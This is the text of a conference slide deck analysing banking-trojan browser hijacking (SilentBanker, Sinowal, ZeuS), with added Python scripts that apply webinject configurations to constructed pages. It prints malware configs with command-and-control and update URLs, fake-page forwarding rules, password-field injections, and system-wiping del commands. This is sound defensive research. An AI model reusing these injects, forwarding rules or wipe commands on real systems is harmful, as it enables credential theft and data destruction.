common browser hijacking methods - terena
Common Browser Hijacking Methods
David Barroso, TERENA Meeting, León
Agenda
Browser Hijacking
Examples: SilentBanker, Sinowal, Wnspoem
Kill the Operating System
Summary
Browser Hijacking
Definition
“Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia)
Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user.
Why are they asking for so much data?
Examples
SilentBanker
Date: 2007
Method: Browser Helper Object
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits
Misc: more than 75 mutations
SilentBanker: Flow Diagram
SilentBanker: BHO Installation
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
@="Microsoft Shared Library Object Version"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]
@="C:\\WINDOWS\\system32\\mfc42dx1.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]
@="SharedObject.SharedObjectVersion.1"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\TypeLib]
@="{5F226421-415D-408D-9A09-0DCD94E25B48}"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\VersionIndependentProgID]
@="SharedObject.SharedObjectVersion"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
SilentBanker: Configuration File
GET X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442
SilentBanker: Configuration File
The encrypted configuration file includes:
• Additional configuration sources
• Dropsite URL
• Update URL
• Data encryption key
[dfgdf]
Bg1=X.Y.67.30/~ipcount/ww6/getcfg.php
Bg2=A.B.100.103/ww6/getcfg.php
[nbmx]
Bg1=X.Y.67.30/~ipcount/ww6/data.php
Bg2=A.B.100.103/ww6/data.php
[kjew]
Bg1=X.Y.67.30/~ipcount/ww6/file.exe
Bg2=A.B.100.103/ww6/file.exe
[sdfs]
secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585…
SilentBanker: Injection Configuration
GET X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442
[jhw18]
pok=insert
qas=passport.yandex.ru/passport
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
xzn=3C2367653E69
xzq=5
rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFEBE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206A767167752122292431222070796E666621227661636867223E0D0A202020203C766163686720676C63722122636E66666A6265712220616E7A722122636E66666…
req=331
Field  Meaning
pok    Action
qas    Target URL
njd    Begin replacement token
dfr    Number of characters in njd -1
xzn    End replacement token
xzq    Number of characters in xzn -1
rek    HTML code injected
req    Number of characters in rek -1
Action   Meaning
insert   insert injected HTML code between tokens
delete   delete HTML code in xzn
replace  replace HTML code in xzn
subreq   substitute xzn with rek
grab     extract field in xzn
SilentBanker: Injection Configuration
Encoded (as stored in rek):
<ge inyvta!"gbc"><gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq><gq jvqgu!"%+1" pynff!"ynory">Платежный пароль:<#gq><gq jvqgu!")$1" pynff!"vachg"><vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1" gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq><gq jvqgu!"&)1"><oe><#gq><#ge>
ROT-13 Algorithm
Decoded:
<tr valign="top"><td width="8%"><div style="width: 40px;"><br /></div></td><td width="17%" class="label">Платежный пароль:</td><td width="50%" class="input"><input type="password" name="passwd2" value="" style="width:50%" tabindex="2">&nbsp;&nbsp;<br/> </td><td width="25%"><br></td></tr>
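As an added example (not code from the talk), the following Python decodes a SilentBanker-style injection record using the field names documented above and applies the "insert" action to a constructed login page, so an analyst can see what a victim's browser would render. It assumes njd, xzn and rek are hex-encoded and that rek is ROT-13 encoded before the hex step; only the letter rotation is handled, not the extra character remapping visible in the slide's sample, and the "insert" action is taken to place rek just before the end token.

```python
import codecs

# Constructed SilentBanker-style record (not the slide's real one) built from the
# field names the slide documents: pok = action, qas = target URL, njd/xzn = begin
# and end tokens, rek = injected HTML, dfr/xzq/req = field length minus one.
# Assumption: njd, xzn and rek are hex-encoded and rek is ROT-13 encoded before
# the hex step (only the letter rotation is handled here).
def _hexfield(value: str, rot13: bool = False) -> str:
    if rot13:
        value = codecs.encode(value, "rot_13")
    return value.encode("latin-1").hex().upper()

BEGIN = '<input type="password" name="passwd">'        # njd
END = "</form>"                                        # xzn
INJECT = '<br>PIN: <input type="password" name="pin">'  # rek
SAMPLE_RECORD = "\n".join([
    "[jhw18]", "pok=insert", "qas=bank.example/login",
    f"njd={_hexfield(BEGIN)}", f"dfr={len(BEGIN) - 1}",
    f"xzn={_hexfield(END)}", f"xzq={len(END) - 1}",
    f"rek={_hexfield(INJECT, rot13=True)}", f"req={len(INJECT) - 1}",
])
# Constructed login page as served by the real site.
SAMPLE_PAGE = ('<form action="/login">User: <input name="login"><br>'
               'Password: <input type="password" name="passwd"></form>')

def parse_record(text: str) -> dict:
    """Parse one [section] of key=value lines, decode hex fields, check counters."""
    rec = {}
    for line in text.splitlines():
        if line and not line.startswith("["):
            key, _, value = line.partition("=")
            rec[key] = value
    rec["njd"] = bytes.fromhex(rec["njd"]).decode("latin-1")
    rec["xzn"] = bytes.fromhex(rec["xzn"]).decode("latin-1")
    rec["rek"] = codecs.decode(bytes.fromhex(rec["rek"]).decode("latin-1"), "rot_13")
    for field, counter in (("njd", "dfr"), ("xzn", "xzq"), ("rek", "req")):
        if int(rec[counter]) != len(rec[field]) - 1:
            raise ValueError(f"{counter} does not match the length of {field}")
    return rec

def apply_insert(html: str, rec: dict) -> str:
    """'insert' action: place rek between the tokens, just before xzn."""
    if rec["pok"] != "insert":
        raise NotImplementedError(rec["pok"])
    start = html.find(rec["njd"])
    end = html.find(rec["xzn"], start + len(rec["njd"])) if start >= 0 else -1
    if end < 0:
        return html  # tokens not found: the page is left untouched
    return html[:end] + rec["rek"] + html[end:]
```

The length counters (dfr/xzq/req) are verified against the decoded fields, so a record whose hex was truncated or edited is rejected rather than silently applied.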
SilentBanker: Original Webpage
SilentBanker: Modified Webpage
Sinowal/Anserin/Torpig
Date: 2005
Method: Code Injection
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits and email
Misc: infects the Master Boot Record (MBR) to be stealthy
Sinowal: Injection
Sinowal does not have a configuration file with details about all the injections.
Each time the user connects to a specific site, Sinowal asks its injection server for instructions.
Sinowal: Injection Example
GET host/Key/EncryptedData
GET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1
Slide callouts on the request: “Tell me the fake page path”, “This is the targeted brand”, “I want the answer encrypted”
Sinowal: Injection Example
Step 3: The injection server looks for the targeted brand:
UK  online*.lloydstsb.* /miheld.ibc {www} /uk/lloyds/lloyds.php 2 0 4
USA onlineid.bankofamerica.com /cgi-bin/sso.login.controller* {www} /usa/bofa_pers/sso.login.php 2 0 3
ES  www*.bancopopular.es /Bpemotor {www} /spain/bancopopular/bancopopular.php 2 0 2
Sinowal: Injection Example
Step 4: the injection server answers:
www*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1
/spain/bancopopular/bancopopular.php: the fake page path
2: You need a GET
0: Number of visits to the real URL
5: Number of injection attempts
1: Injection enabled
Sinowal: Targeted URLs
HTTP Forwarding (Web Injects)
• UK: 40
• DE: 47
• US: 65
• ES: 30
• IT: 18
• AT: 7
• TR: 44
• PL: 7
• AU: 26
• SK: 5
• NZ: 8
• NL: 4
• SG: 2
Wnspoem/PRG/ZeuS/Ntos
Date: 2006
Method: Code Injection
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits
               Version 1   Version 2      Version 3   Version 4
Directory      wnspoem     sysproc64      twain_32    lowsec
Filename       ntos.exe    oembios.exe    twext.exe   sdra64.exe
Stolen data    audio.dll   sysproc86.sys  local.ds    local.ds
Configuration  video.dll   sysproc32.sys  user.ds     user.ds
Wnspoem: Famous Screenshots
Wnspoem: Flow Diagram
Wnspoem: Hooks
Wsock32.dll (FTP/POP3 capture)
• Send
• Sendto
• Closesocket
Ws2_32.dll (FTP/POP3)
• Send
• Sendto
• WSASend
• WSASendTo
• Closesocket
User32.dll (Keylogger)
• GetMessage
• PeekMessage
• GetClipboardData
Crypt32.dll (Certificates)
• PFXImportCertStore
Wininet.dll (Capture data, inject HTML)
• HTTPSendRequest
• InternetReadFile
• InternetReadFileEx
• InternetQueryDataAvailable
• InternetCloseHandle
• HTTPQueryInfo
Ntdll.dll (Infect processes and hide files)
• NtCreateThread
• LdrLoadDll
• LdrGetProcedureAddress
• NtQueryDirectoryFile
Wnspoem: Configuration File
set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
<td align="left" colspan="7" valign="bottom"></td></tr><tr><td class="textoHome" align="left">3. Clave de Transferencias</td><td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td><td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>
data_end
data_after
data_end
Configuration files in the latest wnspoem version use RC4 with 256-bit keys.
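As an added example (not the talk's or the malware's code), this Python parses a constructed wnspoem/ZeuS-style webinject entry in the set_url / data_before / data_inject / data_after format shown above and applies it to a constructed login page, which is how an analyst would preview what a victim sees for a given URL. It assumes '*' is the only wildcard, in both the URL mask and the data masks, and treats the flags column (GP on the slide) as an opaque string.

```python
import re
# Constructed wnspoem/ZeuS-style webinject config (not the slide's real file), in the
# slide's format: "set_url <url-mask> <flags>", then data_before / data_inject /
# data_after blocks closed by data_end; '*' is a wildcard in URL and data masks.
SAMPLE_CONFIG = """\
set_url https://www.bank.example/login*?step=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
</tr><tr><td class="label">3. Clave de Transferencias</td><td><input type="password" name="ESpass"></td>
data_end
data_after
data_end
"""
# Constructed login page fragment as served by the real site.
SAMPLE_PAGE = ('<tr><td class="label">2. Clave de Acceso</td>'
               '<td><input type="password" name="password"></td>'
               '<td><img src="px.gif"></td></tr><tr><td>Entrar</td></tr>')

def parse_webinjects(text: str) -> list:
    """Split the config into entries: {url, flags, before, inject, after}."""
    entries, cur, block = [], None, None
    for line in text.splitlines():
        if line.startswith("set_url"):
            parts = line.split()
            cur = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                   "before": "", "inject": "", "after": ""}
            entries.append(cur)
        elif line in ("data_before", "data_inject", "data_after"):
            block = line[len("data_"):]
        elif line == "data_end":
            block = None
        elif block and cur is not None:
            cur[block] += line  # multi-line blocks are concatenated
    return entries
def _mask_to_regex(mask: str) -> str:
    # '*' matches any run of characters (lazily); everything else is literal
    return ".*?".join(re.escape(part) for part in mask.split("*"))
def inject_page(entries: list, url: str, html: str) -> str:
    """Return the page as the victim's browser renders it after injection."""
    for e in entries:
        if not re.fullmatch(_mask_to_regex(e["url"]), url):
            continue
        before = re.search(_mask_to_regex(e["before"]), html, re.S)
        # data_after, when given, must also appear after the data_before match
        if not before or (e["after"] and not re.search(
                _mask_to_regex(e["after"]), html[before.end():], re.S)):
            continue
        html = html[:before.end()] + e["inject"] + html[before.end():]
    return html
```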
Wnspoem: Original Webpage
Wnspoem: Modified Webpage
Wnspoem: HTTP Forwarding
Some banks use security tokens or a more complex second authentication factor than a password.
In this scenario, HTML injection is avoided, and the user is forwarded to a fake webpage, usually hosted on a compromised site.
Wnspoem: HTTP Forwarding
In the configuration file:
@https://*.barclays.co.uk/* https://*.barclays.co.uk/* http://compromisedhost.com/img/commons/barclay/index.php
@https://*.cajasur.es/* https://*.cajasur.es/* http://compromisedhost.com/img/commons/cajasur/index.php
Wnspoem: Fake Webpage
Wnspoem: Statistics
Analysis and statistics: configuration files
750 configuration files (usually cfg.bin) were analyzed, covering only wnspoem versions 1, 2 and 3.
Wnspoem: Top 10 TLD
Wnspoem: Targeted Brands
Wnspoem: Malicious Domains
Wnspoem: Malicious IP Addresses
Kill the Operating System
Kill the Operating System
It is getting more common that, just after stealing the credentials, the operating system is remotely destroyed.
This action makes the analysis more difficult, since it cannot be done remotely.
The malicious code is not securely deleted from the system and can be recovered.
One optimistic result is that the machine will be reformatted with a new and patched operating system.
Kill the Operating System
Nethell:
• Deletes NTDETECT.COM and ntldr
InfoStealer:
• Deletes \drivers\*.sys
• Deletes some registry keys (HKLM\Microsoft\Windows NT\CurrentVersion\Winlogon: Shell = Explorer.exe)
Wnspoem:
• Deletes HKCU, HKLM\Software and HKLM\System
Glacial Dracon:
• del /A:S /Q /F C:\\*.*
• del /S /Q %SYSTEMROOT% %PROGRAMFILES%
Summary
Summary
Browser hijacking is actively used in fraud schemes.
Targeted brands are all around the world.
Currently, only Microsoft Windows users are affected (Internet Explorer and Firefox).
Be suspicious if your browser is asking for too much information.
Be more suspicious if your computer stops working just after your browser asks for too much information ☺
THANK YOU VERY MUCH